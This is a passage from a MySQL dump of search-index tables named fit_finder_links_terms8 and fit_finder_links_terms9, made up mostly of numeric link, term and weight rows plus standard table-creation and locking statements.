(120,41605,0.95669),(120,41606,0.93331),(120,41607,1.05),(120,41608,1.05),(120,41609,1.21331),(120,41610,1.07331),(120,41611,1.23669),(120,41612,0.98),(120,41613,1.14331),(120,41614,1.00331),(120,41615,1.07331),(120,41616,0.28),(120,41617,0.95669),(120,41618,1.02669),(120,41619,0.88669),(120,41620,0.98),(120,41621,1.00331),(120,41622,1.12),(120,41623,0.18669),(126,41623,0.37338),(120,41624,0.91),(120,41625,1.12),(120,41626,1.05),(120,41627,1.16669),(120,41628,0.98),(120,41629,1.09669),(120,41630,0.95669),(120,41631,1.07331),(120,41632,0.37331),(120,41633,0.95669),(120,41634,1.05),(120,41635,0.86331),(120,41636,1.00331),(120,41637,0.98),(120,41638,0.98),(120,41639,1.09669),(120,41640,0.28),(120,41641,0.91),(120,41642,1.07331),(120,41643,0.14),(120,41644,0.86331),(120,41645,0.95669),(120,41646,0.28),(120,41647,0.95669),(120,41648,1.07331),(120,41649,0.28),(126,41649,0.56),(120,41650,0.93331),(120,41651,1.09669),(120,41707,0.98),(120,41708,1.07331),(120,41709,0.28),(120,41710,0.91),(120,41711,1.02669),(120,41712,0.32669),(120,41713,0.93331),(120,41714,1.05),(120,41715,1.12),(120,41716,0.37331),(120,41717,1.12),(120,41718,1.19),(120,41719,0.74),(120,41720,0.23331),(120,41721,0.88669),(120,41722,0.98),(120,41723,0.93331),(120,41724,1.05),(120,41725,0.86331),(120,41726,0.98),(120,41727,1.09669),(120,41728,1.16669),(120,41729,1.09669),(120,41730,1.21331),(120,41731,0.88669),(120,41732,1.00331),(120,41733,0.42),(120,41734,0.98),(120,41735,1.05),(120,41736,0.88669),(120,41737,1.00331),(120,41738,1.07331),(120,41739,0.93331),(120,41740,1.00331),(120,41741,0.88669),(120,41742,0.98),(120,41743,0.88669),(120,41744,1.16669),(120,41745,0.84),(120,41746,1.00331),(120,41747,0.98),(120,41748,1.02669),(120,41749,0.98),(120,41750,1.07331),(120,41751,1.09669),(120,41752,0.56),(120,41753,0.93331),(120,41754,1.14331),(120,41755,0.93331),(120,41756,1.07331),(120,41757,1.00331),(120,41758,1.12),(120,41759,1.09669),(120,41760,1.14331),(120,41761,1.07331),(120,41762,1.23669),(120,41763,0.95669),(120,41764,1.07331),(120,41765,0.93331),(120,41766,1.12),(120,41767,0.37331),(120,41768,1.02669),(120,41769,1.16669),(120,41770,0.95669),(120,41771,1.05),(120,41772,0.98),(120,41773,1.21331),(120,41774,0.84),(125,41774,0.84),(120,41775,1.00331),(120,41776,0.88669),(120,41777,1.00331),(120,41778,1.02669),(120,41779,1.12),(120,41780,0.93331),(120,41781,1.05),(120,41782,0.93331),(120,41783,1.05),(120,41936,0.14),(120,41937,0.88669),(120,41938,0.95669),(120,41939,0.88669),(120,41940,1.02669),(120,41941,0.81669),(120,41942,0.95669),(120,41943,1.00331),(120,41944,0.56),(120,41945,1.05),(120,41946,1.16669),(120,41947,0.32669),(120,41948,1.00331),(120,41949,1.12),(120,41950,0.86331),(120,41951,0.95669),(120,41952,0.86331),(120,41953,0.95669),(120,41954,0.86331),(120,41955,0.95669),(120,41956,0.86331),(120,41957,1.00331),(120,41958,0.86331),(120,41959,1.09669),(120,41960,0.86331),(120,41961,0.98),(120,41962,0.98),(120,41963,0.93331),(120,41964,1.00331),(120,41965,0.98),(120,41966,2.00662),(120,41967,0.98),(120,41968,1.14331),(120,41969,0.88669),(120,41970,1.00331),(120,41971,0.7),(120,41972,0.98),(120,41973,1.16669),(120,41974,0.84),(120,41975,0.95669),(120,41976,0.86331),(120,41977,1.00331),(120,41978,0.84),(120,41979,0.95669),(120,41980,0.86331),(120,41981,1.00331),(120,41982,1.14331),(120,41983,1.23669),(120,41984,0.60669),(120,41985,1.07331),(120,41986,1.30669),(120,41987,1.07331),(120,41988,1.16669),(120,41989,0.98),(120,41990,1.05),(120,41991,0.46669),(120,41992,1.02669),(120,41993,1.26),(120,41994,0.32669),(120,41995,1.00331),(120,41996,1.19),(120,41997,1.02669),(120,41998,1.12),(120,41999,1.09669),(120,42000,1.33),(120,42001,1.12),(120,42002,1.23669),(120,42003,1.05),(120,42004,0.95669),(120,42005,1.02669),(120,42006,0.46669),(128,42006,0.46669),(120,42007,1.02669),(120,42008,1.12),(120,42009,0.37331),(120,42010,1.05),(120,42011,1.14331),(120,42012,0.42),(120,42013,1.02669),(120,42014,1.12),(120,42015,0.32669),(120,42016,0.93331),(120,42017,1.09669),(120,42018,1.00331),(120,42019,1.09669),(120,42020,0.91),(120,42021,1.02669),(120,42022,1.02669),(120,42023,1.07331),(120,42024,0.95669),(120,42025,1.16669),(120,42026,0.88669),(120,42027,1.05),(120,42028,1.12),(120,42029,0.91),(120,42030,0.98),(120,42031,0.95669),(120,42032,1.05),(120,42033,0.93331),(120,42034,0.95669),(120,42035,1.09669),(120,42036,0.98),(120,42037,1.14331),(120,42038,0.91),(120,42039,1.00331),(120,42040,0.86331),(120,42041,0.98),(120,42042,0.81669),(120,42043,0.91),(120,42044,0.91),(120,42045,0.98),(120,42046,1.07331),(120,42047,0.98),(120,42048,1.07331),(120,42049,0.98),(120,42050,0.98),(120,42051,1.16669),(120,42052,0.88669),(120,42053,0.95669),(120,42054,0.98),(120,42055,1.09669),(120,42056,0.91),(120,42057,1.00331),(120,42058,0.86331),(126,42058,0.86331),(120,42059,0.93331),(120,42060,0.93331),(120,42061,1.02669),(120,42085,0.93331),(120,42086,1.19),(120,42087,0.14),(120,42088,0.88669),(120,42089,0.95669),(120,42090,0.86331),(120,42091,1.09669),(120,42092,0.14),(128,42092,0.14),(120,42093,0.88669),(120,42094,0.95669),(120,42390,0.32669),(120,42391,0.93331),(120,42392,1.12),(120,42393,0.91),(120,42394,0.98),(120,42395,1.14331),(120,42396,1.23669),(120,42397,1.09669),(120,42398,1.28331),(120,42399,0.98),(120,42400,1.05),(120,42401,0.81669),(120,42402,0.93331),(120,42403,0.88669),(120,42404,1.00331),(120,42405,0.81669),(120,42406,0.95669),(120,42407,0.14),(120,42408,0.86331),(120,42409,1.12),(120,42410,1.12),(120,42411,1.23669),(120,42412,0.98007),(120,42413,0.93331),(120,42414,1.07331),(120,42415,1.86662),(120,42416,1.14331),(120,42417,1.02669),(120,42418,0.95669),(120,42419,1.07331),(120,42420,0.32669),(120,42421,0.93331),(120,42422,1.05),(120,42423,0.60669),(120,42424,1.12),(120,42425,1.23669),(120,42426,0.91),(120,42427,0.98),(120,42428,0.18669),(120,42429,0.86331),(120,42430,1.02669),(120,42431,0.88669),(120,42432,1.00331),(120,42433,0.42),(120,42434,1.00331),(120,42435,1.09669),(120,42436,0.37331),(120,42437,0.95669),(120,42438,1.09669),(120,42439,0.98),(120,42440,1.09669),(120,42441,1.00331),(120,42442,1.07331),(120,42443,1.00331),(120,42444,1.19),(120,42445,0.46669),(120,42446,1.02669),(120,42447,1.12),(120,42448,0.46669),(120,42449,1.02669),(120,42450,1.30669),(120,42451,0.37331),(120,42452,1.12),(120,42453,1.30669),(120,42454,0.81669),(120,42455,0.88669),(121,43125,1.00331),(121,43126,1.07331),(121,43127,1.05),(121,43128,1.21331),(121,43129,0.7),(121,43130,1.12),(121,43131,1.21331),(121,43132,0.88669),(121,43133,1.05),(121,43134,0.91),(121,43135,0.98),(121,43136,0.91),(121,43137,0.98),(121,43138,1.33),(121,43139,1.4),(121,43140,0.81669),(121,43141,0.91),(121,43142,0.88669),(121,43143,1.16669),(121,43144,0.23331),(121,43145,0.98),(121,43146,1.12),(121,43147,0.7),(121,43148,1.28331),(121,43149,1.37669),(121,43150,0.37331),(121,43151,1.02669),(121,43152,1.12),(121,43153,0.56),(121,43154,0.98),(121,43155,1.14331),(121,43156,0.98),(121,43157,1.09669),(121,43158,0.32669),(121,43159,0.98),(121,43160,1.05),(121,43161,0.32669),(121,43162,0.93331),(121,43163,1.00331),(121,43164,0.28),(121,43165,1.07331),(121,43166,1.4),(121,43195,0.23331),(121,43196,1.00331),(121,43197,1.09669),(121,43198,0.28),(121,43199,0.98),(121,43200,1.07331),(121,43212,0.88669),(121,43213,1.02669),(121,43214,0.91),(121,43215,1.02669),(121,43216,0.88669),(121,43217,0.95669),(121,43218,0.84),(121,43219,1.09669),(121,43220,0.14),(121,43221,0.93331),(121,43222,1.00331),(121,43223,0.86331),(121,43224,0.93331),(121,43225,1.02669),(121,43226,1.12),(121,43227,1.00331),(121,43228,1.19),(121,43229,1.00331),(121,43230,1.07331),(121,43231,0.88669),(121,43232,1.07331),(121,43233,0.98),(121,43234,1.05),(121,43235,1.77338),(121,43236,2.00662),(121,43237,0.95669),(121,43238,0.98),(121,43239,1.68),(121,43240,0.91),(121,43241,0.91),(121,43242,0.37331),(121,43243,0.93331),(121,43244,1.23669),(121,43245,0.42),(121,43246,0.98),(121,43247,1.28331),(121,43248,1.07331),(121,43249,1.14331),(121,43250,0.91),(121,43251,1.00331),(121,43327,0.93331),(121,43328,1.07331),(121,43329,0.46669),(121,43330,1.12),(121,43331,1.33),(121,43332,0.42),(121,43333,0.98),(121,43334,1.05),(121,43335,1.19),(121,43336,0.14),(121,43337,0.88669),(121,43338,1.16669),(121,43339,0.28),(121,43340,0.91),(121,43341,1.02669),(121,43342,0.32669),(121,43343,1.02669),(121,43344,1.12),(121,43345,0.42),(121,43346,1.4),(121,43347,1.4),(121,43348,0.46669),(121,43349,1.02669),(121,43350,1.37669),(121,43351,0.28),(121,43352,0.91),(121,43353,1.02669),(121,43354,0.95669),(121,43355,1.05),(121,43356,0.7),(121,43357,1.16669),(121,43358,1.37669),(123,44480,0.14),(123,44481,0.84),(123,44735,0.60669),(123,44736,1.16669),(123,44737,1.30669),(123,44738,0.46669),(123,44739,1.07331),(123,44740,1.26),(123,44741,0.32669),(123,44742,1.00331),(123,44743,1.14331),(123,44744,1.12),(123,44745,2.19338),(123,44746,2.42662),(123,44747,0.18669),(123,44748,0.95669),(123,44749,1.14331),(123,44750,0.95669),(123,44751,1.16669),(123,44752,0.98),(123,44753,1.19),(123,44754,0.98),(123,44755,1.12),(123,44776,0.86331),(123,44777,0.93331),(123,44778,0.42),(123,44779,1.00331),(123,44780,1.19),(123,44781,0.14),(123,44782,0.95669),(123,44783,1.07331),(123,44784,0.14),(123,44785,0.98),(123,44786,1.07331),(123,44787,1.12),(123,44788,1.21331),(123,44789,0.37331),(123,44790,1.07331),(123,44791,1.21331),(123,44792,1.00331),(123,44793,1.4),(123,44794,1.02669),(123,44795,1.28331),(123,44796,0.32669),(123,44797,0.93331),(123,44798,1.14331),(123,44799,0.91),(123,44800,1.00331),(123,44801,0.88669),(123,44802,1.16669),(123,44803,1.91338),(123,44804,1.21331),(123,44805,1.07331),(123,44806,0.95669),(123,44807,1.05),(123,44808,1.05),(123,44809,1.12),(123,44810,1.00331),(123,44811,1.00331),(123,44812,1.07331),(123,44813,0.98),(123,44814,1.14331),(123,44815,0.91),(123,44816,1.00331),(123,44817,1.00331),(123,44818,1.12),(123,44819,0.88669),(123,44820,0.95669),(123,44821,0.95669),(123,44822,1.14331),(123,44823,0.91),(123,44824,0.98),(123,44825,1.19),(123,44826,1.00331),(123,44874,0.51331),(123,44875,1.02669),(123,44876,1.16669),(123,44877,0.98),(123,44878,1.07331),(123,44879,0.93331),(123,44880,0.98),(123,44881,1.07331),(123,44882,0.86331),(123,44883,0.98),(123,44884,1.00331),(123,44885,0.91),(123,44886,1.16669),(123,44887,1.02669),(123,44888,0.91),(123,44889,1.00331),(123,44890,0.98),(123,44891,2.33338),(123,44892,2.56662),(123,44893,1.21338),(123,44894,2.42662),(123,44895,1.4),(123,44896,1.4),(123,44897,2.05338),(123,44898,2.28662),(123,44899,0.51331),(123,44900,1.02669),(123,44901,1.14331),(123,44902,0.32669),(123,44903,1.02669),(123,44904,1.14331),(123,44905,0.14),(123,44906,0.91),(123,44907,0.98),(123,44908,0.42),(123,44909,1.21331),(123,44910,1.30669),(123,44911,0.95669),(123,44912,1.09669),(123,44913,0.95669),(123,44914,1.07331),(123,44915,0.98),(123,44916,1.05),(123,44917,1.82),(123,44918,2.38),(123,44919,0.95669),(123,44920,0.98),(123,44921,2.00662),(123,44922,0.18669),(123,44923,0.98),(123,44924,1.05),(123,44925,1.09669),(123,44926,1.23669),(123,44927,0.98),(123,44928,1.26),(123,44949,0.28),(125,44949,0.28),(123,44950,0.91),(125,44950,0.91),(123,44951,0.88669),(123,44952,1.05),(123,45109,0.88669),(123,45110,1.02669),(123,45111,0.95669),(123,45112,1.16669),(123,45113,0.91),(123,45114,1.09669),(123,45115,0.88669),(123,45116,1.00331),(123,45117,0.37331),(123,45118,0.98),(123,45119,1.16669),(123,45120,0.95669),(123,45121,1.02669),(123,45122,1.02669),(123,45123,1.09669),(123,45124,0.23331),(123,45125,1.05),(123,45126,1.12),(123,45127,0.28),(123,45128,1.02669),(123,45129,1.14331),(123,45130,1.82),(123,45131,1.96),(123,45132,1.21331),(123,45133,1.37669),(123,45134,1.35331),(123,45135,1.4),(123,45136,0.37331),(123,45137,0.98),(123,45138,1.14331),(123,45139,1.12),(123,45140,1.21331),(123,45141,0.28),(126,45141,0.28),(123,45142,0.98),(123,45143,1.09669),(123,45144,0.23331),(123,45145,0.93331),(123,45146,1.02669),(123,45147,0.23331),(123,45148,0.98),(123,45149,1.09669),(123,45150,1.02669),(123,45151,1.16669),(123,45152,2.05338),(123,45153,2.56662),(123,45154,1.07331),(123,45155,1.19),(123,45156,0.32669),(123,45157,1.09669),(123,45158,1.21331),(123,45159,1.02669),(123,45160,1.16669),(125,45905,0.95669),(125,46691,0.23331),(126,46691,0.23331),(125,47580,0.91),(125,47581,0.98),(125,47582,0.88669),(125,47583,1.00331),(125,47584,0.98),(125,47585,0.91),(125,47586,1.09669),(125,47587,0.65331),(125,47588,1.14331),(125,47589,1.28331),(125,47590,0.28),(125,47591,0.95669),(125,47592,1.02669),(125,47593,1.82),(125,47594,1.00331),(125,47595,0.88669),(125,47596,0.93331),(125,47597,1.07331),(125,47598,0.93331),(125,47599,1.00331),(125,47600,0.42),(125,47601,1.02669),(125,47602,1.09669),(125,47603,0.86331),(125,47604,0.93331),(125,47605,1.02669),(125,47606,1.21331),(125,47607,1.05),(125,47608,1.21331),(125,47609,0.91),(125,47610,1.07331),(125,47611,1.09669),(125,47612,1.91338),(125,47613,1.07331),(125,47614,1.16669),(125,47615,0.28),(125,47616,0.93331),(125,47617,0.98),(125,47618,0.88669),(125,47619,0.95669),(125,47620,0.86331),(125,47621,0.93331),(125,47641,0.23331),(125,47642,0.95669),(125,47643,1.16669),(125,47644,0.93331),(125,47645,1.02669),(125,47646,0.93331),(125,47647,1.05),(125,47648,0.23331),(125,47649,0.93331),(125,47650,1.19),(125,47651,0.88669),(125,47652,0.98),(125,47653,0.28),(125,47654,0.91),(125,47655,0.98),(125,47656,0.88669),(125,47657,0.93331),(125,47658,1.68),(125,47659,0.98),(125,47660,1.00331),(125,47661,0.95669),(125,47662,1.07331),(125,47663,0.23331),(125,47664,0.98),(125,47665,1.12),(125,47666,0.88669),(125,47667,0.98),(125,47668,0.91),(125,47669,1.09669),(125,47670,0.98),(125,47671,1.26),(125,47672,1.09669),(125,47673,0.98),(125,47674,0.98),(125,47675,0.56),(125,47676,0.95669),(125,47677,1.12),(125,47678,0.95669),(125,47679,1.02669),(125,47680,0.95669),(125,47681,1.09669),(125,47682,0.51331),(125,47683,1.05),(125,47684,1.28331),(125,47685,0.28),(125,47686,1.00331),(125,47687,1.12),(125,47688,1.05),(125,47741,0.98),(125,47742,0.95669),(125,47743,0.98),(125,47744,0.84),(125,47745,0.93331),(125,47746,0.84),(125,47747,0.91),(125,47748,0.84),(125,47749,0.93331),(125,47750,1.09669),(125,47751,0.84),(125,47752,1.05),(125,47753,0.86331),(125,47754,1.00331),(125,47755,0.93331),(125,47756,1.02669),(125,47757,0.81669),(125,47758,0.98),(125,47759,1.02669),(125,47760,1.07331),(125,47761,1.02669),(125,47762,0.98),(125,47763,1.19),(125,47764,1.30669),(125,47765,0.93331),(125,47766,1.02669),(125,47767,0.84),(125,47768,0.91),(125,47769,0.93331),(125,47770,1.12),(125,47771,1.68),(125,47772,1.96),(125,47773,0.93331),(125,47774,1.09669),(125,47775,0.84),(125,47776,1.05),(125,47777,0.93331),(125,47778,0.88669),(125,47779,1.07331),(125,47780,0.93331),(125,47781,0.98),(125,47798,1.00331),(125,47799,0.95669),(125,47800,1.05),(125,47801,0.93331),(125,47802,1.07331),(125,47803,0.91),(125,47804,1.09669),(125,47931,0.28),(125,47932,0.81669),(125,47933,0.88669),(125,47934,0.98),(125,47935,1.16669),(125,47936,0.93331),(125,47937,1.16669),(125,47938,0.88669),(125,47939,1.00331),(125,47940,0.14),(125,47941,0.81669),(125,47942,1.00331),(125,47943,0.98),(125,47944,0.23331),(125,47945,1.02669),(125,47946,1.16669),(125,47947,0.95669),(125,47948,1.05),(125,47949,0.91),(125,47950,1.12),(125,47951,0.46669),(125,47952,1.07331),(125,47953,1.16669),(125,47954,0.42),(125,47955,1.00331),(125,47956,1.12),(125,47957,0.74662),(125,47958,0.95669),(125,47959,1.07331),(125,47960,1.00331),(125,47961,1.09669),(125,47962,0.46669),(125,47963,1.05),(125,47964,1.14331),(125,47965,0.91),(125,47966,1.00331),(125,47967,1.07331),(125,47968,0.42),(125,47969,1.07331),(125,47970,1.21331),(125,47971,0.95669),(125,47972,1.16669),(125,47973,0.09331),(125,47974,0.88669),(125,47975,1.02669),(126,48328,0.84),(126,48329,0.93331),(126,48524,0.88669),(126,48525,1.12),(126,48526,0.84),(126,48527,0.95669),(126,48528,0.32669),(126,48529,0.98),(126,48530,1.21331),(126,48531,0.51331),(126,48532,1.14331),(126,48533,1.23669),(126,48534,0.32669),(126,48535,1.00331),(126,48536,1.09669),(126,48537,0.28),(126,48538,0.98),(126,48539,1.05),(126,48540,0.95669),(126,48541,1.02669),(126,48542,0.86331),(126,48543,1.19),(126,48544,1.07331),(126,48545,1.14331),(126,48546,0.37331),(126,48547,0.95669),(126,48548,1.14331),(126,48549,0.28),(126,48550,0.98),(126,48551,1.09669),(126,48552,0.88669),(126,48553,1.02669),(126,48554,1.07331),(126,48555,1.23669),(126,48585,0.93331),(126,48586,0.93331),(126,48587,1.07331),(126,48588,1.96),(126,48589,2.38),(126,48590,0.32669),(126,48591,0.95669),(126,48592,1.12),(126,48593,1.49324),(126,48594,0.98),(126,48595,1.21331),(126,48596,1.02669),(126,48597,1.19),(126,48598,1.09669),(126,48599,1.19),(126,48600,1.00331),(126,48601,1.12),(126,48602,0.88669),(126,48603,0.95669),(126,48604,1.12),(126,48605,0.98),(126,48606,1.12),(126,48607,0.95669),(126,48608,1.07331),(126,48609,1.02669),(126,48610,1.09669),(126,48611,0.91),(126,48612,1.00331),(126,48613,1.05),(126,48614,1.12),(126,48615,0.28),(126,48616,1.02669),(126,48617,1.14331),(126,48618,0.37331),(126,48619,1.02669),(126,48620,1.12),(126,48621,0.98),(126,48622,1.09669),(126,48623,0.91),(126,48624,1.12),(126,48625,0.37331),(126,48626,1.16669),(126,48627,1.33),(126,48628,0.28),(126,48629,0.95669),(126,48630,1.02669),(126,48631,0.86331),(126,48632,0.95669),(126,48633,1.00331),(126,48634,1.14331),(126,48635,1.02669),(126,48636,1.12),(126,48716,0.88669),(126,48717,0.84),(126,48718,0.95669),(126,48719,0.88669),(126,48720,0.88669),(126,48721,0.98),(126,48722,1.16669),(126,48723,0.91),(126,48724,1.12),(126,48725,0.91),(126,48726,1.05),(126,48727,0.91),(126,48728,0.98),(126,48729,0.95669),(126,48730,1.02669),(126,48731,0.95669),(126,48732,1.23669),(126,48733,0.88669),(126,48734,1.07331),(126,48735,0.95669),(126,48736,1.05),(126,48737,1.96),(126,48738,1.09669),(126,48739,1.07331),(126,48740,1.05),(126,48741,1.00331),(126,48742,1.02669),(126,48743,0.95669),(126,48744,1.16669),(126,48745,0.95669),(126,48746,1.05),(126,48747,0.88669),(126,48748,0.98),(126,48749,0.93331),(126,48750,1.00331),(126,48751,0.95669),(126,48752,0.91),(126,48753,0.98),(126,48754,0.88669),(126,48755,0.95669),(126,48756,1.02669),(126,48757,0.88669),(126,48758,0.95669),(126,48780,0.18669),(126,48781,0.98),(126,48782,1.05),(126,48909,1.21331),(126,48910,0.32669),(126,48911,1.05),(126,48912,1.16669),(126,48913,0.74662),(126,48914,1.05),(126,48915,1.19),(126,48916,1.05),(126,48917,1.16669),(126,48918,0.98),(126,48919,1.12),(126,48920,0.98),(126,48921,1.05),(126,48922,0.91),(126,48923,1.00331),(126,48924,0.98),(126,48925,1.16669),(126,48926,0.91),(126,48927,1.00331),(126,48928,0.32669),(126,48929,1.02669),(126,48930,1.09669),(126,48931,1.12),(126,48932,1.23669),(126,48933,0.42),(126,48934,0.98),(126,48935,1.05),(126,48936,0.95669),(126,48937,1.12),(126,48938,1.02669),(126,48939,1.16669),(126,48940,0.37331),(126,48941,1.05),(126,48942,1.14331),(128,50500,0.23331),(128,50524,0.84),(128,51133,0.77),(128,51134,0.81669),(128,51257,0.77),(128,51258,0.81669),(128,51259,0.28),(128,51260,0.93331),(128,51261,1.09669),(128,51262,0.28),(128,51263,0.98),(128,51264,1.12),(128,51265,1.07331),(128,51266,1.21331),(128,51267,0.32669),(128,51268,0.95669),(128,51269,1.07331),(128,51270,1.07331),(128,51271,1.19),(128,51272,0.60669),(128,51273,1.07331),(128,51274,1.19),(128,51275,0.51331),(128,51276,1.02669),(128,51277,1.16669),(128,51278,3.64014),(128,51279,1.21331),(128,51280,1.28331),(128,51281,1.09669),(128,51282,1.21331),(128,51283,1.07331),(128,51284,1.19),(128,51285,1.07331),(128,51286,1.19),(128,51287,1.12),(128,51288,1.19),(128,51289,1.23669),(128,51290,1.37669),(128,51291,1.95993),(128,51292,1.14331),(128,51293,1.28331),(128,51294,1.12),(128,51295,1.28331),(128,51296,1.00331),(128,51297,1.09669),(128,51298,0.93331),(128,51299,1.02669),(128,51300,1.05),(128,51301,1.14331),(128,51302,0.95669),(128,51303,1.07331),(128,51304,1.12),(128,51305,1.35331),(128,51330,0.37331),(128,51331,1.00331),(128,51332,1.12),(128,51333,0.18669),(128,51334,0.98),(128,51335,1.05),(128,51336,0.98),(128,51337,1.14331),(128,51338,0.98),(128,51339,1.09669),(128,51340,1.77338),(128,51341,0.98),(128,51342,1.02669),(128,51343,0.91),(128,51344,1.19),(128,51345,0.88669),(128,51346,1.02669),(128,51347,0.95669),(128,51348,1.07331),(128,51349,0.88669),(128,51350,1.09669),(128,51351,1.19),(128,51352,1.05),(128,51353,0.95669),(128,51354,0.95669),(128,51355,0.98),(128,51356,1.02669),(128,51357,2.05338),(128,51358,1.12),(128,51359,1.16669),(128,51360,1.96),(128,51361,1.07331),(128,51362,1.14331),(128,51363,1.00331),(128,51364,1.16669),(128,51365,0.95669),(128,51366,1.00331),(128,51411,0.91),(128,51412,1.14331),(128,51413,0.93331),(128,51414,1.00331),(128,51415,0.86331),(128,51416,1.05),(128,51417,0.88669),(128,51418,1.05),(128,51419,0.95669),(128,51420,1.14331),(128,51421,0.93331),(128,51422,1.07331),(128,51423,0.42),(128,51424,1.09669),(128,51425,1.23669),(128,51426,0.32669),(128,51427,1.09669),(128,51428,1.16669),(128,51429,1.00331),(128,51430,1.09669),(128,51431,1.00331),(128,51432,1.07331),(128,51433,0.95669),(128,51434,1.02669),(128,51435,0.91),(128,51436,1.23669),(128,51437,1.00331),(128,51438,1.14331),(128,51439,0.91),(128,51440,1.07331),(128,51447,0.88669),(128,51448,1.02669),(128,51449,0.23331),(128,51450,0.93331),(128,51451,1.19),(128,51598,0.91),(128,51599,1.05),(128,51600,0.46662),(128,51601,0.93331),(128,51602,1.05),(128,51603,0.91),(128,51604,1.00331),(128,51605,0.74662),(128,51606,1.02669),(128,51607,1.19),(128,51608,1.02669),(128,51609,1.16669),(128,51610,1.07331),(128,51611,1.19),(128,51612,0.91),(128,51613,1.05),(128,51614,1.68),(128,51615,0.91),(128,51616,0.93331),(128,51617,1.02669),(128,51618,1.14331),(128,51619,0.84),(128,51620,1.16669),(128,51621,1.00331),(128,51622,0.95669),(128,51623,1.05),(128,51624,1.00331),(128,51625,1.07331),(128,51626,1.07331),(128,51627,0.93331),(128,51628,1.07331),(128,51629,1.12),(128,51630,0.98),(128,51631,1.09669),(128,51632,0.88669),(128,51633,0.95669),(128,51634,1.07331),(128,51635,0.88669),(128,51636,0.95669),(128,51637,1.26),(128,51638,1.16669),(128,51639,1.05),(128,51640,1.12),(128,51641,0.86331),(128,51642,0.93331),(128,51643,0.56),(128,51644,0.93331),(128,51645,1.07331),(128,51646,0.98),(128,51647,1.14331),(128,51648,0.23331),(128,51649,0.88669),(128,51650,1.05),(128,51651,1.00331),(128,51652,1.14331),(128,51653,0.28),(128,51654,1.00331),(128,51655,1.14331),(133,52412,0.51331),(133,52413,1.14331),(133,52414,1.37669),(133,52415,0.98),(133,52416,1.07331),(133,52417,1.86662),(133,52418,2.42662),(133,52419,0.98),(133,52420,1.16669),(133,52421,0.32669),(133,52422,0.95669),(133,52423,1.07331),(133,52424,1.14331),(133,52425,1.23669),(133,52426,1.14331),(133,52427,1.23669),(133,52439,1.02669),(133,52440,5.18),(133,52441,6.41321),(133,52442,0.98),(133,52443,1.09669),(133,52444,1.09669),(133,52445,0.98),(133,52446,1.00331),(133,52447,1.07331),(133,52448,0.46669),(133,52449,1.02669),(133,52450,1.35331),(133,52454,1.07331),(133,52455,1.21331),(133,52456,1.00331),(133,52457,1.07331),(133,52458,0.95669),(133,52459,1.00331),(133,52460,1.97321),(133,52461,0.93331),(133,52462,1.02669),(133,52463,2.00662),(133,52464,1.07331),(133,52465,1.12),(133,52466,1.05),(133,52467,1.30669),(133,52468,0.93331),(133,52469,1.26),(133,52470,0.42),(133,52471,1.00331),(133,52472,1.28331),(133,52492,0.23331),(133,52493,1.00331),(133,52494,1.07331),(133,52495,5.92),(133,52496,1.37669),(133,52497,5.92),(133,52498,7.03),(133,52499,0.95669),(133,52500,1.19),(133,52501,0.95669),(133,52502,1.19),(133,52503,0.37331),(134,52503,0.37331),(133,52504,1.00331),(133,52505,1.21331),(134,52617,0.42),(134,52618,0.37331),(134,52619,1.21331),(134,52620,1.4),(134,52628,2.42662),(134,52629,1.19),(134,52630,0.32669),(134,52631,1.19),(134,52632,1.4),(134,52633,0.27993),(134,52634,0.95669),(134,52635,1.05),(134,52636,0.91),(134,52637,1.19),(134,52638,0.84),(134,52639,1.12),(134,52640,1.02669),(134,52641,1.35331),(134,52646,0.84),(134,52647,0.95669),(134,52648,0.95669),(134,52649,0.46669),(134,52650,1.02669),(134,52651,1.35331),(134,52652,1.12),(134,52653,1.21331),(134,52654,1.82007),(134,52655,1.19),(134,52656,1.35331),(134,52657,2.47338),(134,52658,1.35331),(134,52659,1.4),(134,52660,1.16669),(134,52661,0.84),(134,52662,1.02669),(134,52663,1.12),(134,52664,1.07331),(134,52665,1.21331),(134,52666,0.86331),(134,52667,1.07331),(134,52668,1.00331),(134,52669,1.12),(134,52702,1.05),(134,52703,1.12),(134,52704,1.02669),(134,52705,1.28331); /*!40000 ALTER TABLE `fit_finder_links_terms8` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms9` -- DROP TABLE IF EXISTS `fit_finder_links_terms9`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms9` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms9` -- LOCK TABLES `fit_finder_links_terms9` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms9` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms9` VALUES (3,81,0.32669),(3,82,1.00331),(3,83,1.09669),(3,311,0.56),(3,312,0.93331),(3,313,1.07331),(3,314,0.98),(3,315,0.23331),(3,316,0.88669),(3,317,1.07331),(3,318,0.37331),(3,319,1.07331),(3,320,1.23669),(9,454,0.23331),(104,454,0.46662),(9,455,0.86331),(104,455,0.86331),(9,456,1.05),(9,457,0.37331),(9,458,0.93331),(9,459,1.07331),(9,571,0.37331),(9,572,1.05),(9,573,1.12),(103,1555,0.23331),(123,1555,0.23331),(35,1555,0.46662),(107,1555,0.46662),(110,1555,0.46662),(52,1555,1.23321),(35,1558,0.18669),(106,1558,0.18669),(112,1558,0.18669),(116,1558,0.18669),(123,1558,0.18669),(134,1558,0.18669),(125,1564,0.37331),(117,1564,0.74662),(23,1564,1.0666),(77,1564,1.0666),(103,1564,1.0666),(104,1564,1.0666),(105,1564,1.0666),(106,1564,1.0666),(107,1564,1.0666),(111,1564,1.0666),(112,1564,1.0666),(114,1564,1.0666),(120,1564,2.23986),(113,1564,2.61317),(20,3026,0.18669),(77,3026,0.18669),(25,3026,0.64008),(23,3048,2.9334),(77,3048,2.9334),(103,3048,2.9334),(104,3048,2.9334),(105,3048,2.9334),(106,3048,2.9334),(107,3048,2.9334),(111,3048,2.9334),(112,3048,2.9334),(114,3048,2.9334),(25,3062,2.95992),(25,3063,3.28008),(35,9297,1.77338),(35,9298,1.96),(111,9299,0.01169),(119,9299,0.01169),(123,9299,0.01169),(35,9299,0.02338),(104,9299,0.02338),(117,9299,0.02338),(105,9299,0.03507),(113,9299,0.04676),(120,9299,0.04676),(125,9299,0.04676),(126,9299,0.04676),(68,9299,0.05845),(103,9299,0.05845),(116,9299,0.05845),(112,9299,0.09352),(110,9299,0.31563),(35,9300